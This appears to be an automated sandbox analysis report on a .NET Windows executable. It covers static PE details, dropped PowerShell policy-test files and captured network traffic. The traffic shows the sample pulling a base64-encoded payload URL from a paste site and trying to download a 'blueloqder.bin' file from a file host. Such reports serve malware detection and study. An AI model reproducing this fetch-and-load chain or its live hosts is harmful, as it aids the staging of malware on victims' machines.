                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4t52kw1.fzk.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sj112slz.afi.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xv3xpunj.ifa.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0wcz5sv.qix.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:MS Windows registry file, NT/2000 or above
                                                        Category:dropped
                                                        Size (bytes):1835008
                                                        Entropy (8bit):4.417049558560347
                                                        Encrypted:false
                                                        SSDEEP:6144:qcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNf5+:Hi58oSWIZBk2MM6AFBZo
                                                        MD5:CCC797388FC7392A22C17ABC43189CC0
                                                        SHA1:04DE0E4BE6084491F7C6352F2A47544C60C6E18B
                                                        SHA-256:01F60CA188BCEDA99774B41C720BD36E9F8349C14084BC9301F766414C70E2A4
                                                        SHA-512:AF1DF79D212E9D930257D6687AEF0A73E9EDB0AB6E8FEB3CE08790107051E337430BF025C3246AF0CF4523D80E51B7CD0C7D1F7846C75CA1FE7DA0E1F726F62B
                                                        Malicious:false
                                                        Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.W.x.).................................................................................................................................................................................................................................................................................................................................................L........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):5.175360398735887
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:9K25QyJ4hA.exe
                                                        File size:15'872 bytes
                                                        MD5:7e658759b69b246757803baf9f776a60
                                                        SHA1:6e1304c6539500ba0100327ac64858c25639387c
                                                        SHA256:b5858b684b93cec0c56768fda67e721595bdfa7d14dbf45b74abbf686c9b66a2
                                                        SHA512:ef84ad21b1da818c9e10e70e4e82c4ae63cb07a0aeb15c354512af4c99a0ca0a079fcbd22815183e5847abe1cd7824aa09a21a72b8b2c3798840ed02d0e78b2e
                                                        SSDEEP:384:ZgnOsus6BvAAQv/UOgRtr+lxJECoysFwIiiE:ZBsuLpIgQ9Mw5b
                                                        TLSH:8A62075493E88732E97F0B7A4D7752810BB2BA2ADC62CF4D2D88B05E1CA3385471177B
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&............"...0..2..........JP... ...`....@.. ....................................`................................

                                                        File Icon

                                                        Icon Hash:00928e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x40504a
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x95FD26BA [Mon Sep 27 22:48:26 2049 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x4ff80x4f.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x6a0.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x4f180x38.text
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000x30500x3200False0.504296875data5.552858741926838IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc0x60000x6a00x800False0.33447265625data3.586738052421582IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x80000xc0x200False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_VERSION0x60900x410data0.36538461538461536
                                                        RT_MANIFEST0x64b00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 8, 2023 14:35:52.223818064 CET49699443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:35:52.223862886 CET44349699104.21.70.240192.168.2.7
                                                        Dec 8, 2023 14:35:52.223937988 CET49699443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:35:52.239789963 CET49699443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:35:52.239828110 CET44349699104.21.70.240192.168.2.7
                                                        Dec 8, 2023 14:35:52.512232065 CET44349699104.21.70.240192.168.2.7
                                                        Dec 8, 2023 14:35:52.512384892 CET49699443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:35:52.523931980 CET49699443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:35:52.523956060 CET44349699104.21.70.240192.168.2.7
                                                        Dec 8, 2023 14:35:52.524341106 CET44349699104.21.70.240192.168.2.7
                                                        Dec 8, 2023 14:35:52.569574118 CET49699443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:35:52.596983910 CET49699443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:35:52.640764952 CET44349699104.21.70.240192.168.2.7
                                                        Dec 8, 2023 14:35:53.094223976 CET44349699104.21.70.240192.168.2.7
                                                        Dec 8, 2023 14:35:53.094388962 CET44349699104.21.70.240192.168.2.7
                                                        Dec 8, 2023 14:35:53.094487906 CET49699443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:35:53.102587938 CET49699443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:35:53.243980885 CET49700443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:35:53.244035959 CET443497005.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:35:53.244132042 CET49700443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:35:53.244709969 CET49700443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:35:53.244735956 CET443497005.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:35:53.985361099 CET443497005.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:35:53.985539913 CET49700443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:35:53.988929033 CET49700443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:35:53.988940954 CET443497005.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:35:53.989353895 CET443497005.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:35:53.991056919 CET49700443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:35:54.032748938 CET443497005.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:35:55.145309925 CET443497005.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:35:55.145369053 CET443497005.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:35:55.145427942 CET443497005.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:35:55.145443916 CET49700443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:35:55.145463943 CET49700443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:35:55.147336006 CET49700443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:36:01.804163933 CET49705443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:36:01.804224014 CET44349705104.21.70.240192.168.2.7
                                                        Dec 8, 2023 14:36:01.804284096 CET49705443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:36:01.834043026 CET49705443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:36:01.834098101 CET44349705104.21.70.240192.168.2.7
                                                        Dec 8, 2023 14:36:02.103276014 CET44349705104.21.70.240192.168.2.7
                                                        Dec 8, 2023 14:36:02.103391886 CET49705443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:36:02.105905056 CET49705443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:36:02.105931997 CET44349705104.21.70.240192.168.2.7
                                                        Dec 8, 2023 14:36:02.106375933 CET44349705104.21.70.240192.168.2.7
                                                        Dec 8, 2023 14:36:02.147711039 CET49705443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:36:02.193670034 CET49705443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:36:02.236740112 CET44349705104.21.70.240192.168.2.7
                                                        Dec 8, 2023 14:36:02.696007967 CET44349705104.21.70.240192.168.2.7
                                                        Dec 8, 2023 14:36:02.696105957 CET44349705104.21.70.240192.168.2.7
                                                        Dec 8, 2023 14:36:02.696152925 CET49705443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:36:02.702927113 CET49705443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:36:02.707292080 CET49706443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:36:02.707328081 CET443497065.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:36:02.707398891 CET49706443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:36:02.707814932 CET49706443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:36:02.707823992 CET443497065.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:36:03.451107025 CET443497065.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:36:03.451190948 CET49706443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:36:03.452826977 CET49706443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:36:03.452836037 CET443497065.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:36:03.453104019 CET443497065.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:36:03.454859018 CET49706443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:36:03.496743917 CET443497065.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:36:04.613408089 CET443497065.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:36:04.613426924 CET443497065.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:36:04.613481045 CET443497065.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:36:04.613662958 CET49706443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:36:04.613662958 CET49706443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:36:04.614324093 CET49706443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:36:09.919384003 CET49708443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:36:09.919421911 CET44349708104.21.70.240192.168.2.7
                                                        Dec 8, 2023 14:36:09.919488907 CET49708443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:36:09.932663918 CET49708443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:36:09.932677984 CET44349708104.21.70.240192.168.2.7
                                                        Dec 8, 2023 14:36:10.197026968 CET44349708104.21.70.240192.168.2.7
                                                        Dec 8, 2023 14:36:10.197104931 CET49708443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:36:10.200032949 CET49708443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:36:10.200042009 CET44349708104.21.70.240192.168.2.7
                                                        Dec 8, 2023 14:36:10.200270891 CET44349708104.21.70.240192.168.2.7
                                                        Dec 8, 2023 14:36:10.241465092 CET49708443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:36:10.293195963 CET49708443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:36:10.336734056 CET44349708104.21.70.240192.168.2.7
                                                        Dec 8, 2023 14:36:10.812419891 CET44349708104.21.70.240192.168.2.7
                                                        Dec 8, 2023 14:36:10.812490940 CET44349708104.21.70.240192.168.2.7
                                                        Dec 8, 2023 14:36:10.812536001 CET49708443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:36:10.817372084 CET49708443192.168.2.7104.21.70.240
                                                        Dec 8, 2023 14:36:10.828536034 CET49710443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:36:10.828577042 CET443497105.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:36:10.828658104 CET49710443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:36:10.829025030 CET49710443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:36:10.829036951 CET443497105.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:36:11.568223953 CET443497105.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:36:11.568316936 CET49710443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:36:11.570564985 CET49710443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:36:11.570575953 CET443497105.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:36:11.570828915 CET443497105.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:36:11.572465897 CET49710443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:36:11.612761021 CET443497105.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:36:12.681587934 CET443497105.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:36:12.681607008 CET443497105.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:36:12.681672096 CET443497105.253.86.15192.168.2.7
                                                        Dec 8, 2023 14:36:12.681687117 CET49710443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:36:12.682645082 CET49710443192.168.2.75.253.86.15
                                                        Dec 8, 2023 14:36:12.684767962 CET49710443192.168.2.75.253.86.15

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 8, 2023 14:35:52.078845024 CET6427753192.168.2.71.1.1.1
                                                        Dec 8, 2023 14:35:52.205636024 CET53642771.1.1.1192.168.2.7
                                                        Dec 8, 2023 14:35:53.111895084 CET5665953192.168.2.71.1.1.1
                                                        Dec 8, 2023 14:35:53.242748976 CET53566591.1.1.1192.168.2.7

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Dec 8, 2023 14:35:52.078845024 CET192.168.2.71.1.1.10xc86aStandard query (0)paste.foA (IP address)IN (0x0001)false
                                                        Dec 8, 2023 14:35:53.111895084 CET192.168.2.71.1.1.10x5d30Standard query (0)oshi.atA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Dec 8, 2023 14:35:52.205636024 CET1.1.1.1192.168.2.70xc86aNo error (0)paste.fo104.21.70.240A (IP address)IN (0x0001)false
                                                        Dec 8, 2023 14:35:52.205636024 CET1.1.1.1192.168.2.70xc86aNo error (0)paste.fo172.67.140.164A (IP address)IN (0x0001)false
                                                        Dec 8, 2023 14:35:53.242748976 CET1.1.1.1192.168.2.70x5d30No error (0)oshi.at5.253.86.15A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • paste.fo
                                                        • oshi.at

                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.749699104.21.70.2404436780C:\Users\user\Desktop\9K25QyJ4hA.exe
                                                        TimestampBytes transferredDirectionData
                                                        2023-12-08 13:35:52 UTC74OUTGET /raw/015dbe46ef97 HTTP/1.1
                                                        Host: paste.fo
                                                        Connection: Keep-Alive
                                                        2023-12-08 13:35:53 UTC811INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 38 20 44 65 63 20 32 30 32 33 20 31 33 3a 33 35 3a 35 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6d 72 30 63 37 31 67 32 6d 67 62 64 61 68 31 30 39 37 75 38 32 71 64 38 67 69 3b 20 70 61 74 68 3d 2f 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 74 6f 6b 65 6e 3d 64 65 6c 65 74 65 64 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 30 31 2d 4a 61 6e 2d 31 39 37 30 20 30 30 3a 30 30 3a 30 31 20 47 4d 54
                                                        Data Ascii: HTTP/1.1 200 OKDate: Fri, 08 Dec 2023 13:35:53 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 48Connection: closeSet-Cookie: PHPSESSID=mr0c71g2mgbdah1097u82qd8gi; path=/Set-Cookie: token=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
                                                        2023-12-08 13:35:53 UTC48INData Raw: 61 48 52 30 63 48 4d 36 4c 79 39 76 63 32 68 70 4c 6d 46 30 4c 33 52 78 53 6b 46 6a 4c 32 4a 73 64 57 56 73 62 33 46 6b 5a 58 49 75 59 6d 6c 75
                                                        Data Ascii: aHR0cHM6Ly9vc2hpLmF0L3RxSkFjL2JsdWVsb3FkZXIuYmlu


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.7497005.253.86.154436780C:\Users\user\Desktop\9K25QyJ4hA.exe
                                                        TimestampBytes transferredDirectionData
                                                        2023-12-08 13:35:53 UTC77OUTGET /tqJAc/blueloqder.bin HTTP/1.1
                                                        Host: oshi.at
                                                        Connection: Keep-Alive
                                                        2023-12-08 13:35:55 UTC158INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 38 20 44 65 63 20 32 30 32 33 20 31 33 3a 33 35 3a 35 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 34 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                        Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 08 Dec 2023 13:35:55 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
                                                        2023-12-08 13:35:55 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.749705104.21.70.2404437544C:\Users\user\Desktop\9K25QyJ4hA.exe
                                                        TimestampBytes transferredDirectionData
                                                        2023-12-08 13:36:02 UTC74OUTGET /raw/015dbe46ef97 HTTP/1.1
                                                        Host: paste.fo
                                                        Connection: Keep-Alive
